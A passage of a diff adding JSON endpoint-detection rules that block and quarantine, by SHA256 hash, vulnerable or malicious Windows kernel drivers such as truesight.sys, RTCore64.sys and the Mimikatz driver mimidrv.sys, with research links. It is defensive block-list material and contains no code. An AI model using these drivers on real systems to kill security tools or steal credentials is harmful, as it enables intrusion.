+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820515Z",
+ "creation_date": "2026-03-23T11:45:31.820517Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820525Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a3d1c4bd7153c6f49c0ea0f3db72126dfa4fa9235d783bb5e8ce9de1d4e78bd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab6b172e-5c69-5cc6-904b-af7e87f74a99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824221Z",
+ "creation_date": "2026-03-23T11:45:30.824224Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824229Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f56a17f13eaa76384ebb5586f5e63b24729f90888fd5be9c9ee3a39690f428b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab70ba02-f666-591a-939b-345777165767",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977694Z",
+ "creation_date": "2026-03-23T11:45:29.977696Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977702Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9345c3af554c06aa949492f1642a7a03404956d2952cca8a68658b62dccb0825",
+ "comment": "Malicious Kernel Driver (aka ndislan.sys) [https://www.loldrivers.io/drivers/ca1e8664-841f-4e4b-9e67-3f515cc249c6/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab84e72a-9bec-52d3-8783-abcb2b7aed57",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621479Z",
+ "creation_date": "2026-03-23T11:45:29.621481Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621486Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ce231637422709d927fb6fa0c4f2215b9c0e3ebbd951fb2fa97b8e64da479b96",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab85c293-15d1-53a7-a935-d7957892279a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819830Z",
+ "creation_date": "2026-03-23T11:45:30.819832Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819837Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "642857fc8d737e92db8771e46e8638a37d9743928c959ed056c15427c6197a54",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab8dcca1-cc32-50bd-a233-0094b7e0ceec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608245Z",
+ "creation_date": "2026-03-23T11:45:29.608247Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608252Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "90c9e8bed1aeb314636a7bc86e26e484eade53c744d2e8a7a316459709760a5e",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab90e8aa-4d3e-5b98-8137-653a0784e2bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455891Z",
+ "creation_date": "2026-03-23T11:45:30.455895Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455904Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3bf77c52cc0e6b1b0f2b8ceffaadb156673768146950401c27fbfd7e2bedd618",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab942bca-b90e-53f7-8b3b-1e4a55ef62a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476174Z",
+ "creation_date": "2026-03-23T11:45:30.476177Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476186Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d04c72fd31e7d36b101ad30e119e14f6df9cbc7a761526da9b77f9e0b9888bc4",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab94ee49-57bf-59a7-943d-e69b5a5b8aca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147394Z",
+ "creation_date": "2026-03-23T11:45:31.147396Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147402Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "add4f9ca3e0cb3a429dc5b5c1b0e035483aa73a8b4343933da3d6fccbe26cf13",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ab9b3a91-da92-5ed7-b23f-da4c8f00dde3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464626Z",
+ "creation_date": "2026-03-23T11:45:30.464629Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "64d4370843a07e25d4ceb68816015efcaeca9429bb5bb692a88e615b48c7da96",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "abaac0c3-c86f-5cee-b18a-7511f5021c99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980976Z",
+ "creation_date": "2026-03-23T11:45:29.980977Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980983Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9bd8b0289955a6eb791f45c3203f08a64cbd457fd1b9d598a6fbbca5d0372e36",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "abacd25c-6918-565d-aa0f-f0e2f8831dd1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970366Z",
+ "creation_date": "2026-03-23T11:45:29.970368Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970373Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b61b09f6313a567b6fcdec2e961f6a118a2314aed5519dd2b9830c4ace758c03",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "abb1658e-0415-5854-9016-a974522c365f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140565Z",
+ "creation_date": "2026-03-23T11:45:31.140567Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140572Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1971f32f211b10e0b13b1fc29389704ee30f5a0af76e8b44bbc36cc3a0a75ca0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "abb674bf-d003-5d6d-bda6-bd9d518bcee5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144411Z",
+ "creation_date": "2026-03-23T11:45:31.144413Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144418Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd0c0af7261a6ca81fa1981e4e51b6502216e75f9fc80af30d8b4c8bd6958669",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "abc988bb-db47-5053-a44c-22d089808b27",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460664Z",
+ "creation_date": "2026-03-23T11:45:30.460667Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460691Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1cedd5815bb6e20d3697103cfc0275f5015f469e6007e8cac16892c97731c695",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "abca81ef-5292-55ef-9a00-8486d991ccf5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976464Z",
+ "creation_date": "2026-03-23T11:45:29.976466Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976472Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1716d4c523aeea9703032ca93eb9668b9a16f542c00cec248b0a1c132d80bb15",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "abe415a1-2eff-5129-9a7d-7b4946486789",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150071Z",
+ "creation_date": "2026-03-23T11:45:31.150073Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150078Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ee93b7d88c8b12daa635eabbf410dcc85ca59d09236bc370e9d3cde005d02fa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "abeb7395-225a-57f3-b3c0-39b9c726e960",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978248Z",
+ "creation_date": "2026-03-23T11:45:29.978250Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978255Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6908ebf52eb19c6719a0b508d1e2128f198d10441551cbfb9f4031d382f5229f",
+ "comment": "Malicious Kernel Driver (aka wantd_2.sys) [https://www.loldrivers.io/drivers/aa687f89-4f3b-4b59-b64e-fee5e2ae2310/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "abf38035-9853-5f02-8d5c-5c258db158db",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611694Z",
+ "creation_date": "2026-03-23T11:45:29.611696Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611701Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "68b0a239031b158e2927bb5dc8844b662cb4616ee8c1363fa729aa8fa0d86cff",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "abfa4c63-ffc3-588d-9628-4e25ba6b93b4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820271Z",
+ "creation_date": "2026-03-23T11:45:31.820274Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820282Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "906dbf004c8a502c821be0783c09c0834f0def4adf74402b5181bad93fb04d19",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac1102a0-ca1d-54a8-b069-1371c83754e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154587Z",
+ "creation_date": "2026-03-23T11:45:31.154589Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154594Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d6d0573dd11a89a44ce660398984afd191466af7f3fe96e719ffb4b7fe590fa5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac1a02a5-e2f0-5f95-be88-8007595339c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808414Z",
+ "creation_date": "2026-03-23T11:45:31.808416Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808422Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d01999f5cdc1e01f5e426d1464e2ee6f0c16f8734a669f9bef5c8428e8671c7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac239dd8-d616-5b79-9439-a3b3ed002616",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479722Z",
+ "creation_date": "2026-03-23T11:45:30.479724Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479729Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
